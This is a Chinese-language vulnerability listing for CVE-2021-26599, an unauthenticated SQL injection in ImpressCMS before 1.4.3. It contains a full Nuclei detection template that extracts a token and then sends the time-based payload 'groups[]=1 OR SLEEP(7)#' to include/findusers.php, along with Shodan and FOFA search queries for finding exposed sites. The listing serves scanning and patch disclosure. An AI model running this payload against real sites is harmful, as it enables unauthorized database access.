CVE-2021-26599: ImpressCMS < 1.4.3 - SQL Injection

日期: 2025-08-01 | 影响软件: ImpressCMS | POC: 已公开

漏洞描述

ImpressCMS before 1.4.3 is vulnerable to SQL injection via the groups parameter in include/findusers.php, allowing unauthenticated attackers to execute arbitrary SQL queries.

PoC代码[已公开]

id: CVE-2021-26599

info:
  name: ImpressCMS < 1.4.3 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    ImpressCMS before 1.4.3 is vulnerable to SQL injection via the groups parameter in include/findusers.php, allowing unauthenticated attackers to execute arbitrary SQL queries.
  remediation: |
    Update ImpressCMS to version 1.4.3 or later.
  reference:
    - https://hackerone.com/reports/1081145
    - http://karmainsecurity.com/KIS-2022-04
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26599
  classification:
    cve-id: CVE-2021-26599
    cwe-id: CWE-89
    epss-score: 0.05638
    epss-percentile: 0.89997
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: impresscms
    product: impresscms
    shodan-query: http.html:"ImpressCMS"
    fofa-query: body="ImpressCMS"
  tags: cve,cve2021,impresscms,sqli,time-based-sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*)'"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /include/findusers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_submit=1&token={{token}}&groups[]=1%20OR%20SLEEP(7)#

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - status_code==200
          - contains(body, "array(1) {")
        condition: and
# digest: 4a0a004730450220662e923851529035feb2b1edb7983a9cdef0836f9dbf4d711e3e133e14d16ace02210087425661f28585ff6bcd14911f6224c6d5a37bf1da817e7f4bbea8c7b3fd6122:922c64590222798bb761d5b6d8e72950

相关漏洞推荐